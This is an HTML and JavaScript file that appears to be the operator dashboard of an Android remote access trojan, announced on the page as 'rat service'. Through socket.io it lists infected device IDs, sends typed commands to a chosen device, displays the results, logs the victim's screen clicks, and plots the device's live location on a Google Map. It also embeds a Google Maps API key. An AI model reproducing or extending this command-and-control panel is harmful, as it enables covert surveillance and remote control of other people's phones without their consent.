<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>

    <link rel="icon" href="https://www.freeiconspng.com/thumbs/android-icon/green-android-icon-31.png">

    <script src="socket.io/socket.io.js" ></script>

    <style>
        body{
            margin: 0;
            display: flex;
            flex-direction: column;
            background-color: #455969;
        }
        #monitor{
            width: 90vw;
            height: 50vh;
            background-color: rgb(78, 76, 82);
            align-self: center;
            border-radius: 20px;
            padding: 15px;
            font-size: 1.3rem;
            overflow-y: auto;
          color: #fdf4f4;
            border: 6px double #36a4ff;
        }
        #inp{
            background-color: #455969;
            border: 3px solid #36a4ff;
            border-radius: 10px;
            padding: 5px;
            width: 90vw;
            align-self: center;
            margin-top: 15px;
            color: aliceblue;
        }
        p{
            width: 100%;
            overflow-wrap: break-word;
            background-color: rgb(3, 3, 3);
            padding: 2px;

            border-radius: 5px;
            
        }
        #map{
            width: 70%;
            height: 500px;
            margin-top: 25px;
            border-radius: 10px;
            margin-bottom: 50px;
            border: 5px ridge black ;
            background-color: #249bfd93;
            align-self: center;
        }


        #clickinfo{
            background-color: #474e4ce8;
            border: 5px outset rgb(235, 155, 108);
            color: rgb(128, 187, 74);
            width: 70%;
            height: 250px;
            overflow: auto;
            border-radius: 10px;
            align-self: center;
           margin-top: 10px;
           margin-bottom: 15px;

        }
        #con{

            display: flex;
            padding: 10px;
            margin: 15px;
            border: 1px solid rgb(224, 221, 221);
            background-color: #6b727944;
            border-radius: 5px;
        }
        #quary{
display: flex;
width: 90%;
align-self: center;
background-color: rgba(68, 142, 253, 0.658);
height: 250px;
border-bottom-left-radius: 35px;
border-bottom-right-radius: 35px;
margin-bottom: 50px;
padding: 10px;
border: 2px solid snow;
        }

        #find{
flex: 1;
justify-self: center;
align-self: center;
justify-content: center;
align-content: center;
display: flex;
flex-direction: column;
border-right: 1px solid greenyellow;
        }
        #delet{
flex: 1;
display: flex;
flex-direction: column;
justify-self: center;
align-self: center;
align-items: center;
        }
        #allids{
            background-color: #66839b;
            width: 80%;
            height: 180px;
            align-self: center;
            margin: 7px;
            padding: 5px;
            overflow: auto;
            border: 1px solid seashell;
            border-radius: 10px;
        display: flex;
        flex-direction: column;
        }


        #btn_1{
            background-color: rgba(64, 255, 175, 0.952);
            font-size: 18px;
border-radius: 10px;
padding: 4px;
letter-spacing: 3px;
color: rgb(66, 63, 63);
            align-self: center;
        }


    </style>
    <script>
        var map;
        var marker;

        function initMap() {
            
         // The location of Uluru
         const uluru = { lat: -25.344, lng: 131.036 };
         // The map, centered at Uluru
         map = new google.maps.Map(document.getElementById("map"), {
           zoom: 10,
           center: uluru,
         });
         // The marker, positioned at Uluru
         marker = new google.maps.Marker({
           position: uluru,
           map: map,
           icon:''
         });
       }


       function AddMarks(position){
        const marker = new google.maps.Marker({
           position: position,
           map: map,
           icon:''
         });
       }

</script>

</head>
<body>
    


    <div id="quary">
        <div id="find">
            
            <div id="allids">
                <h3 style="align-self: center;background-color: rgba(172, 243, 219, 0.938);padding: 3px;border-radius: 2px;">Devices</h3>
                <div id="every_ides" style="width: 93%;display: flex;flex-direction: column;align-self: center;padding: 2px;">
                   <i style="background-color: #89a7c09c;padding: 2px;">all id's</i>
                   
                </div>

            </div>
            <button id="btn_1">find</button>

        </div>
        
        <div id="delet">
            <div id="del">
                <input id="delet_id" placeholder="enter id">
                <button id="deletd" style="background-color: rgba(240, 80, 80, 0.753);padding: 5px;border-radius: 4px;color: #fdf4f4;margin: 3px;">delete</button>
            </div>

            <div id="con">
                <input id="roomid" placeholder="enter your user id">
                <button onclick="joinRoom()" style="background-color: rgba(86, 67, 252, 0.89);border-radius: 5px;padding: 5px;color: #fdf4f4;margin-left: 3px;">connect</button>
            </div>
        </div>


    </div>






    <div id="monitor">
         
         <p style="text-align: center;background-color: #36a5ff9a;"> Wellcome to rat service</p>

 
    </div>
    <input  id="inp" placeholder="enter command">

    <div id="clickinfo">
<h4 style="text-align: center;background-color: rgb(157, 187, 187);color: rgb(255, 255, 255);">click info</h4>
    </div>
    <div id="map">

    </div>



</body>
<!--CONNECT-WITH-GOOGLE MAP>-->
<script 
src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCDbgSgPBdh1P6TyVXWJzip-mZMY9NjkeM&callback=initMap&libraries=&v=weekly"
async
></script>
<script >
    
  var socket =io('/')
var commands = document.getElementById("inp");
var monitor = document.getElementById("monitor");
var clickinfo = document.getElementById("clickinfo")
var  roomnumber = document.getElementById("roomid")
var find_button = document.getElementById("btn_1")
var delet_button = document.getElementById("deletd")



commands.addEventListener("keypress", function(event) {
    

    if (event.keyCode == 13){
        
        socket.emit("msg",String(roomnumber.value),commands.value.toString())
        commands.value = ""
    }

});




socket.on("location",data=>{
   var mylocation =  JSON.parse(data)
   changelocation(mylocation.latitude,mylocation.longitude)
})


socket.on('msg',data=>{
        addData(data)
})

socket.on("screeninfo",(data)=>{

Allclickevents(data)

})



function getallids(url){

return new Promise((resolve,reject)=>{
    var xhr = new XMLHttpRequest();
xhr.open("POST", url);
xhr.setRequestHeader("Accept", "application/json");
xhr.setRequestHeader("Content-Type", "application/json");

    xhr.onreadystatechange = function () {

   if (xhr.readyState === 4) {

      resolve(xhr.responseText)
      
   }
};
xhr.send()
})



}



function addData(data){
   var myPelement = document.createElement("p")
   myPelement.innerText = data
   monitor.appendChild(myPelement);
}


function joinRoom(){


if(String(roomnumber.value).length > 1){
    socket.emit("join_room",String(roomnumber.value))
}
    else{alert("value mising")}
}



function Allclickevents(data){
    var myPelement = document.createElement("p")
    myPelement.innerText = data
    
    clickinfo.appendChild(myPelement)
}

find_button.addEventListener("click",()=>{

   getallids("/id/get/notrequire").then((val)=>{
    document.getElementsByName("I4").forEach((elem)=>elem.remove())
    addIDinidbox("every_ides",JSON.parse(val))
   }).catch((err)=>{
       console.log(err)
   })
    
    
})

function addIDinidbox(idname,data=[]){
    if(data.length >0){
    data.forEach((element)=>{
        var item = document.createElement("i")
        item.innerText=element;
        item.style.backgroundColor="#f1f1f1"
        item.style.width="100%"
        item.style.textAlign="center"
        item.setAttribute("name","I4")
        document.getElementById(idname).appendChild(item)
    })
}
}


delet_button.addEventListener("click",()=>{
    var values = document.getElementById("delet_id")

    getallids(`/id/delet/${values.value?values.value:"no value pass"}`).then((val)=>{
    document.getElementsByName("I4").forEach((elem)=>elem.remove())
    addIDinidbox(JSON.parse(val))
   }).catch((err)=>{
       console.log(err)
   })
})


</script>

<script>

    function changelocation(late_T,long_T){
   var latitute =Number(late_T)
   var longatute =Number(long_T)

   const uluru = { lat: latitute, lng: longatute };
   // The map, centered at Uluru
/*
   map = new google.maps.Map(document.getElementById("map"), {
   zoom: 10,
   center: uluru,
  
   });
   */
   //map.setCenter(new google.maps.LatLng(latitute, longatute), 10)

   marker.setPosition(new google.maps.LatLng(latitute,longatute));

/*
   // The marker, positioned at Uluru
   const marker = new google.maps.Marker({
   position: uluru,
   map: map,
   icon:''
   });
   */
   }
   
  
   </script>


</html>